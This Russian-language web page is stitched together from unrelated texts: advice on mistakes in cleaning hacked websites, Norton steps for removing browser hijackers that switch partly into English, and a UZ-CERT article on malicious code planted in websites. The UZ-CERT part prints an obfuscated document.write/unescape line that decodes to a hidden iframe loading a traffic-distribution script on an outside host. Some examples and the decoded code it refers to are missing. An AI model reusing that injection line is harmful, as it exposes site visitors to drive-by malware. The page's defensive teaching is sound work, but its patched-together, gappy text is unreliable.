Вредоносная веб страница. Что такое вредоносный код. Защита от вредоносного кода

На сайте завелся вирус, и, как любой зараженный объект, ваш веб-ресурс превратился в один большой источник неприятностей: теперь он не только не приносит прибыль, но и порочит вашу репутацию в интернете, от вас отворачиваются покупатели, поисковые системы и даже хостер.

Вы остаетесь один на один со своей проблемой и пытаетесь решить ее собственными силами, не обращаясь к профессионалам, зато следуя советам «специалистов» с форумов. Или заказываете лечение сайта там, где «подешевле». Что поделать, ведь всегда хочется решить проблему как можно быстрее и с наименьшими затратами. Но всегда ли такой подход оправдан?

Представляем вашему вниманию ТОП-7 ошибок прошедшего года, которые совершали веб-мастера, стараясь восстановить работоспособность сайта после взлома и заражения.

Ошибка №1. Восстановление сайта из бэкапа как способ избавиться от вредоносного кода

Очень часто проблему заражения сайта вредоносным кодом веб-мастера пытаются решить откатом сайта до последней чистой версии. И продолжают восстанавливать веб-проект каждый раз, как только вирус на сайте вновь дает о себе знать. Увы, это неудобный и очень рисковый вариант.

Правильное решение: Сайт нужно лечить и ставить защиту от взлома, чтобы избежать повторного заражения. Во-первых, контент сайта может обновляться, на сайт могут устанавливаться новые плагины, в скрипты сайта могут вноситься изменения. Каждый откат назад означает, что вы теряете результаты трудов всех последних дней. Но есть и более важная причина для кардинальной борьбы со взломом: а что если хакер в один прекрасный день решит уничтожить ваш сайт полностью, ведь у него есть доступ к вашему веб-ресурсу?

Ошибка №2. Обман поисковика с целью вывода сайта из-под санкций

Сайт попадает в список «угрожающих безопасности компьютера или мобильного устройства…» из-за вируса на сайте или редиректа посетителей на зараженный ресурс. В панели веб-мастера отображаются примеры зараженных страниц, но хитрый или невежественный веб-мастер вместо решения проблемы (поиска и удаления источника вредоносного кода) удаляет некоторые страницы, которые показывают поисковики в примерах заражения. Или, как вариант, целиком блокируют доступ к сайту с помощью правил в robots.txt, наивно полагая, что это заблокирует и доступ антивирусному боту к сайту.

Правильное решение: Нужно найти вирусный код на сайте и удалить его. Запрещать индексацию не только бесполезно, но и опасно. Во-первых, страницы сайта могут выпасть из поискового индекса. Ну, а, во-вторых, робот антивирусного сервиса работает по правилам, отличным от правил поискового механизма, и запрет индексации на него никак не влияет.

Ошибка №3. Использование сканера вредоносного кода некомпетентными специалистами

С целью экономии или по каким-то другим причинам лечением сайта начинает заниматься недостаточно подготовленный специалист, который не может на 100% определить, является ли фрагмент, выделенный сканером вредоносного кода, действительно опасным. В результате можно наблюдать две крайности: удаляются абсолютно все подозрения на вирус, что приводит к поломке сайта, либо вредоносный код устраняется не полностью, что провоцирует рецидив.

Правильное решение: Очевидно, что лечением веб-ресурса должны заниматься профессионалы. В отчете сканеров вредоносного кода бывают ложные срабатывания, так как один и тот же фрагмент может использоваться как в легитимном коде, так и хакерском. Нужно анализировать каждый файл, иначе можно удалить критические элементы, что может привести к сбоям в работе сайта или его полной поломке. Или, наоборот, есть риск не распознать хакерский шелл, что приведет к повторному заражению веб-ресурса.

Ошибка №4. Игнорирование сообщений (в панели веб-мастера) о присутствии вредоносного кода на сайте

Уведомление о присутствии вредоносного кода на сайте в панели веб-мастера может быть непостоянным. Сегодня система пишет, что на вашем сайте вирус, а завтра - молчит. Владельцу сайта приятнее думать, что в системе произошел какой-то сбой, и его сайт вне всяких подозрений. Однако на практике все обстоит не так. Существуют разные виды заражений. Вредоносный код может появляться на сайте лишь на какое-то время, а потом исчезать. Это значит, что при очередной проверке сайта ботом антивируса поисковой системы вредонос может быть обнаружен, а при другой - нет. В результате веб-мастер «расслабляется» и начинает игнорировать опасное сообщение: «Зачем тратить время на лечение, ведь сайт не заблокировали».

Правильное решение: Если на сайте замечена вредоносная активность, скорее всего ваш, веб-ресурс взломан и заражен. Вирусы на сайте не появляются сами по себе. То, что вчера поисковик обнаружил подозрительный код на сайте, а потом «промолчал», не только не должно игнорироваться веб-мастером, а, наоборот, должно послужить сигналом к тревоге. Кто знает, каким образом ваш ресурс будет эксплуатироваться завтра? - Спам, фишинг или редиректы. Нужно сразу выполнить сканирование сайта на наличие хакерских бэкдоров, шеллов, пролечить и защитить от взлома.

Ошибка №5. Лечение сайтов фрилансерами-непрофессионалами.

В принципе, работа с фрилансерами в данном вопросе ничем не отличается от других сфер. Дешево - не всегда качественно, зато почти всегда без гарантий и договорных отношений. Большинство фрилансеров, не специализирующихся на проблемах безопасности сайтов, работают с последствиями хакерской атаки, но не с причиной - уязвимостями сайта. А это значит, что сайт могут взломать повторно. Хуже того, встречаются и недобросовестные исполнители, которые могут подсадить другой вредоносный код на сайт, украсть базу данных и т.п.

Правильное решение: Обратитесь в специализированную компанию, которая занимается лечением и защитой сайтов от взлома. Сотрудники таких компаний каждый день удаляют вредоносный код, видят мутацию вирусов и следят за эволюцией хакерских атак. Темный рынок взломов не стоит на одном месте, он развивается и требует постоянного мониторинга и соответствующих ответных действий при лечении и защите сайта от несанкционированных вторжений.

Ошибка №6. Ежедневное/еженедельное удаление одного и того же вируса с сайта.

Эта проблема касается особых «энтузиастов», которые готовы на регулярной основе устранять последствия взлома. Такие веб-мастера уже знают, какой конкретно код будет подсажен на сайт, конкретно куда и когда это произойдет. Так можно бесконечно бороться с мобильным редиректом, который ежедневно в 09-30 внедряется злоумышленником в файл.htaccess и перенаправляет ваш мобильный трафик на сайт по продаже виагры или порноконтента. Только вот незадача: хакерский бот делает это в автоматическом режиме, а вам приходится выполнять операцию по удалению вручную. Не честно ведь, правда?

Правильное решение: Можно бесконечно удалять последствия (вирусы, редиректы и пр.), но эффективнее проверить сайт на вредоносные и хакерские скрипты, удалить их и установить защиту от взлома, чтобы больше вирусный код не появлялся. А освободившееся время потратить более эффективно. Главное, помните, что у хакера уже есть доступ к вашему сайту, а это значит, что в следующий раз он может не ограничиться знакомым вам вредоносным кодом, а использовать ваш сайт для более серьезных кибер-преступлений.

Ошибка №7. Лечение завирусованного сайта антивирусом для компьютера

Понятие «антивирус» для некоторых веб-мастеров универсально, и они пытаются вылечить взломанный и зараженный сайт с помощью антивируса, предназначенного для компьютера. Делается бэкап сайта и проверяется десктопной версией антивирусного программного обеспечения. Увы, но такое лечение не в состоянии дать желаемых результатов.

Правильное решение: Вирусы на сайте и на компьютере - не одно и тоже. Для проверки сайта нужно использовать специализированное ПО или обращаться к специалистам. Десктопные антивирусы, какими бы хорошими они ни были, не предназначены для лечения сайтов от вирусов, так как их база данных ориентирована на вирусы и «трояны» на компьютере.

На этом все. Не наступайте на те же грабли!

Данная неполадка может быть вызвана внедрением вредоносной программы в браузер. Этот тип вредоносных программ направлен на изменение параметров браузера. Возможно возникновение любой из указанных ниже ситуаций:

Если на экране отобразится всплывающее окно со ссылкой на сторонний веб-сайт службы поддержки или вы уверены, что стали объектом мошеннических действий, ознакомьтесь со статьей .

Выполнение сканирования Norton Power Eraser - Сканирование на нежелательные приложения

Выберите в качестве расположения Рабочий стол и нажмите кнопку Сохранить .

Для запуска Norton Power Eraser дважды щелкните файл NPE.exe .

Если появилось окно

Сканирование на нежелательные приложения .

Результаты сканирования Norton Power Eraser будут показаны в окне .

В окне Сканирование на нежелательные приложения завершено нажмите кнопку Удалить напротив нежелательного приложения или панели инструментов.

Выполните показанные на экране инструкции.

После завершения процесса удаления перезагрузите компьютер.

Если Norton Power Eraser не удалось удалить нежелательные панели инструментов, удалите их вручную с помощью функции "Установка и удаление программ" или "Удаление программы" на панели инструментов. Программы показа рекламы обычно устанавливают новые панели инструментов в браузерах и изменяют службу поиска, применяемую по умолчанию. Для того чтобы полностью удалить нежелательные панели инструментов и службы поиска, необходимо сбросить настройки веб-браузера.

Запустите Internet Explorer.

В меню Сервис выберите Управление надстройками .

В окне Надстройки выберите Панели инструментов и расширения в разделе Типы надстроек .

Если показанный список будет содержать подозрительную панель инструментов, выберите ее и нажмите кнопку Отключить .

В окне Надстройки выберите Поставщики поиска в разделе Типы надстроек .

Выберите службу поиска и нажмите Использовать по умолчанию .

Выберите неизвестную службу поиска и нажмите Удалить и Закрыть .

В меню Сервис выберите Свойства обозревателя .

На вкладке Общие в разделе Домашняя страница введите адрес предпочитаемой начальной страницы.

Нажмите кнопки Применить и OK .

На рабочем столе щелкните правой кнопкой значок Internet Explorer и выберите Свойства .

В окне Свойства Internet Explorer на вкладке Ярлык удалите текст после iexplore.exe в поле Объект .

Нажмите Применить и OK для сохранения изменений.

Нажмите кнопку Закрыть .

Запустите Google Chrome.

В правом верхнем углу нажмите значок Настройка и управление Google Chrome , затем выберите Настройки .

В области Chrome нажмите Расширения .

В окне Расширения выберите неизвестные расширения и нажмите значок корзины.

В области Chrome нажмите Настройки .

В окне Настройки выберите Следующие страницы в разделе Начальная группа .

В окне Начальные страницы выберите подозрительные записи и нажмите значок X .

Нажмите кнопку OK .

В окне Настройки выберите Показывать кнопку "Главная страница" в разделе Внешний вид и нажмите Изменить .

В окне Главная страница выберите пункт Страница быстрого доступа и нажмите кнопку OK .

В окне Настройки нажмите в разделе Поиск .

В окне Поисковые системы выберите предпочитаемую поисковую систему и нажмите Использовать по умолчанию .

В списке Настройка поиска по умолчанию выберите неизвестную службу поиска и нажмите значок X .

Нажмите кнопку Готово .

Запустите Firefox.

В правом верхнем углу нажмите значок Открыть меню и выберите Дополнения .

На странице Управление дополнениями выберите Расширения .

Проверьте список расширений на наличие подозрительных записей. Если они есть, выберите расширение и нажмите Отключить .

Нажмите значок Открыть меню и выберите Настройки .

На вкладке Основные окна Настройки нажмите кнопку Восстановить по умолчанию .

Нажмите кнопку OK .

В окне Firefox нажмите значок со стрелкой вниз рядом с полем URL и выберите Управление поисковыми системами .

В окне Управление списком поисковых систем выберите неизвестную службу поиска и нажмите кнопку Удалить .

Нажмите кнопку OK .

Выполните сканирование Norton Power Eraser

Дважды щелкните файл NPE.exe для запуска Norton Power Eraser.

Если появилось окно Управление учетными записями пользователей , нажмите кнопку Да или Продолжить .

Ознакомьтесь с условиями лицензионного соглашения и нажмите кнопку Принять .

В окне Norton Power Eraser нажмите значок Сканировать на предмет угроз .

По умолчанию Norton Power Eraser выполняет сканирование системы на наличие руткитов и предлагает перезагрузить систему. В окне запроса на перезагрузку системы нажмите кнопку Перезагрузить . Для отказа от сканирования на наличие руткитов выберите .

После перезапуска компьютера процесс сканирования запускается автоматически. Выполните показанные на экране инструкции.

Дождитесь результатов сканирования.

Видеоролик Требуется дополнительная помощь? Check for incorrect DNS settings

control

Click the Network and Internet icon, and then click Network and Sharing Center . In the left pane, click Change adapter settings .

On Windows XP: Double-click the Network Connections icon.

Right-click the network adapter that is currently active, and then click Properties .

If the User Account Control prompt appears, click Yes or Continue .

In the Network Connection Properties window, under "This connection uses the following items", click Internet Protocol (TCP/IP) or Internet Protocol Version 4 (TCP/IPv4) .

Click Properties .

In the Internet Protocol (TCP/IP) Properties window, on the General tab, check the DNS server settings.

• If Use the following DNS server addresses radio button is selected, check the server addresses. Make sure that the DNS server addresses displayed are the same that are provided to you by your Internet service provider or your network administrator.

  If the DNS server address starts with 85.255.11x.x, then it is more likely that the DNS cache has been poisoned as the result of a Pharming attack.

Fix incorrect Windows host file settings

Press the Windows + R keys to open the Run dialog box.

Type in the following text, and then press Enter .

C:\Windows\System32\Drivers\etc

Replace the drive letter if C : drive is not the system drive.

For each Hosts file that you find, right-click the file, and then click Open With or Open .

Double-click Notepad from the list of programs.

Remove any line that appears in your hosts file without an # at the beginning, apart from the "127.0.0.1 localhost" line.

On the File menu, select Save .

Check if you can access the Internet.

Fix incorrect proxy settings

If you have not configured your computer to use proxy for the Internet connection, you can skip this Step.

Start Internet Explorer.

On the Tools menu, select Internet Options .

On the Connections tab, click LAN Settings .

Verify that your proxy settings are correct. Do one of the following:

If the proxy settings are incorrect, make sure that you enter the correct proxy settings.

If the proxy settings are correct, temporarily disable the proxy. Uncheck Use a proxy server for your LAN.

In the Internet Options window, click Apply > OK .

Uninstall or disable unknown toolbars

If you want to completely remove a toolbar, you can use Add/Remove Programs or Uninstall a Program in the Control Panel.

Start Internet Explorer.

On the Tools menu, click Manage Add-ons .

If you find any unknown toolbar that is listed, select the toolbar, and then click Disable .

Click Close .

If the issue persists, go to Step 5.

Run a scan using Norton Power Eraser

Save the file to Windows desktop.

Open the windows run dialog (Windows key+R).

Drag and drop NPE.exe into the run box, this will automatically populate it with the full path Add the following switch to the end of the line:

The run line should look like:

"C:\Documents and Settings\user_name\Desktop\NPE.exe" /VSS 111

Click OK .

If the scan comes clean, go to Step 6.

Рубрика: .

Данная статья ориентирована на пользователей сети Интернет и владельцев информационных ресурсов. Целью статьи является описание методов заражения веб-сайтов вредоносным кодом, возможными последствиями от этого и способы борьбы с вредоносным ПО.

Что же такое этот вредоносный код, откуда он берется и насколько это опасно?

Вредоносный код представляет собой ссылку на ресурс, содержащий вредоносное ПО. Наиболее встречаемые на сегодняшний день это либо поддельный антивирус (Fake Antivirus), либо модуль подмены выдачи поисковых запросов, либо ПО для рассылки спама. В некоторых случая вредоносное ПО может совмещать в себе функции кражи конфиденциальных данных с компьютера пользователя, к примеру, это могут быть пароли от административных интерфейсов управления веб-сайтами, пароли на ftp, аккаунты к онлайн сервисам.

1) Вредоносная ссылка ведет на систему распределения трафика (TDS). Система распределения трафика позволяет перенаправлять посетителя в зависимости от страны, операционной системы, браузера, используемого языка и других деталей на различные ресурсы. Ресурсы эти, в свою очередь, содержат вредоносное ПО именно для данной аудитории, либо данного, уязвимого ПО. Причем, в случае перехода по вредоносной ссылке с непредусмотренного злоумышленником браузера или версии операционной системы вы увидите либо просто пустой экран, либо, к примеру, поисковую страницу Google. Это немного затрудняет выявление вредоносного ПО. Тем не менее, при тщательном анализе можно понять логику системы и защититься от заражения.
2) Вредоносная ссылка ведет на «сплоиты» для популярных браузеров и программных продуктов. «Сплоиты» — это специально сформированные коды, использующие уязвимости в программном обеспечении для незаметной загрузки и исполнения на компьютере пользователя вредоносного ПО. В данном случае, определяется ПО пользователя и в случае его уязвимости происходит заражение.

Для сокрытия присутствия вредоносного кода на веб-сайте его шифруют, но встречаются случаи и открытого кода.

Пример шифрованной вредоносной ссылки: document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E’));

Проведем небольшой анализ структуры вредоносной ссылки:
имя домена — bestlotron.cn
скрипт — in.cgi (система распределения трафика SUTRA)
схема — cocacola51

Вредоносные ссылки с перенаправлением на систему распределения трафика в последнее время являются самыми встречаемыми. В данном случае злоумышленник, получив доступ к веб-сайту и внедрив вредоносную ссылку на систему распределения трафика на своем ресурсе, может управлять трафиком с этого веб-сайта. В схеме «cocacola51», которая указана в примере, может присутствовать не одно вредоносное ПО. Таким образом, система распределения трафика является всего лишь посредником между посетителем взломанного веб-сайта и вредоносным ПО злоумышленника.

Второй пример наглядно демонстрирует зашифрованную вредоносную ссылку. Как правило, для шифрования используются простые алгоритмы и практически в 99% такие ссылки без труда расшифровываются.

После расшифровки получаем следующий код:

Теперь мы можем наблюдать уже и адрес сайта, и знакомый нам по первому примеру скрипт системы распределения трафика со схемой 3.

Откуда же берется этот код на веб-сайтах и чем он может быть опасен?
Как правило, вручную веб-сайты уже не взламывают. Все давно автоматизировано. Для этих целей хакерами написано множество, как прикладных программ, так и серверных приложений. Самый распространенный процесс автоматизированного внедрения вредоносных ссылок на веб-сайты — это кража ftp паролей и дальнейшая обработка этих данных специализированным приложением Iframer. Работа Iframer’а проста — производить подключение к ресурсам по списку ftp аккаунтов, находить файлы по заданной маске, как правило, это файлы индексных страниц веб-сайтов, и внедрять в них уже готовый вредоносный код. Поэтому, после удаления кода, многие веб-сайты заражаются повторно, даже при смене всех паролей доступа, в том числе и на ftp. Причиной этому может служить наличие вируса для кражи паролей на компьютере, с которого осуществляется администрирование веб-сайтом.

Бывают случаи, когда владельцы веб-сайтов, на которых появляется вредоносный код, относятся несерьезно к данной проблеме. Согласен, вреда как такового самому ресурсу данный код не причиняет. Страдают лишь посетители зараженного веб-сайта. Но есть и другие стороны, на которые я хочу обратить внимание.

Веб-сайт, на котором находится вредоносный код, рано или поздно попадает во всевозможные базы разносчиков заразы – Malware site list, а также поисковые системы, такие как Google или Yandex, могут пометить зараженный веб-сайт как потенциально опасный. Убрать с такой базы свой ресурс при его попадании туда будет крайне сложно. Также, не исключена возможность рано или поздно получить «абузу» — жалобу от посетителей веб-сайта. В этом случае существует вероятность как блокирования доменного имени веб-сайта, так и блокирования его IP-адреса. Бывали случаи, когда из-за одного зараженного веб-сайта блокировались целые подсети.

Как же защититься от появления вредоносных кодов на своих ресурсах? Для этого необходимо выполнять ряд требований ИБ:

1) Установить на рабочий компьютер, с которого осуществляется администрирование веб-сайта антивирусное ПО, желательно лицензионное с ежедневно обновляемыми базами.
2) Установить и настроить межсетевой экран таким образом, чтобы весь трафик при работе с сетью проходил проверку и, в случае обращения к подозрительным хостам была возможность его блокирования.
3) Использовать сложные пароли на административные интерфейсы и доступы к сервисам ftp и ssh.
4) Не сохранять пароли в программах Total Commander, Far и других файловых менеджерах. Как правило, практически все троянские программы уже умеют захватывать эти данные и переправлять злоумышленнику.
5) Не открывать и не запускать полученные по электронной почте либо скачанные из сети Интернет файлы, предварительно не проверив их антивирусным ПО.
6) Обновлять программное обеспечение, установленное на компьютере. Своевременно устанавливать заплатки к операционным системам и обновлять прикладное ПО. Порой программы, которыми вы пользуетесь повседневно могут служить дырой в системе для проникновения вредоносного ПО. В частности Adobe Acrobat Reader, Flash Player, программы из пакета MS Office и др.

Если Вы соблюдаете все меры защиты, описанные выше, но обнаружили вредоносный код на своем ресурсе, виной этому может быть также и хостинг-провайдер, точнее настройки сервера на котором размещен ваш ресурс. В этом случае необходимо обратиться в службу поддержки вашего хостинг-провайдера и попросить их выявить и устранить причину инцидента.

Как Вы знаете, в Узбекистане в сентябре 2005 года по постановлению Президента страны была создана Служба реагирования на компьютерные инциденты UZ-CERT . Специалисты Службы помимо своих основных обязанностей также выполняют и работу по обнаружению вредоносных кодов на сайтах в национальной доменной зоне. Для этих целей был написан ряд прикладных программ для автоматизации основных моментов, но, конечно же, немаловажную роль играет и ручной просмотр подозрительных на заражение веб-сайтов. Порой удачно замаскированный вредоносный код подвергшийся «обфускации» — изменению структуры кода, автоматическими средствами обнаружить невозможно. Информация обо всех обнаруженных зараженных веб-сайтах публикуется на веб-сайте Службы, а также в разделе UZ-CERT на uForum.uz. Владельцы зараженных ресурсов получают оповещения, консультации и помощь для устранения угроз и дальнейшей защиты их систем. Мы искренне надеемся, что данная работа приносит пользу пользователям сети Интернет и помогает избежать массового заражения персональных компьютеров вредоносным ПО.

В Одноклассники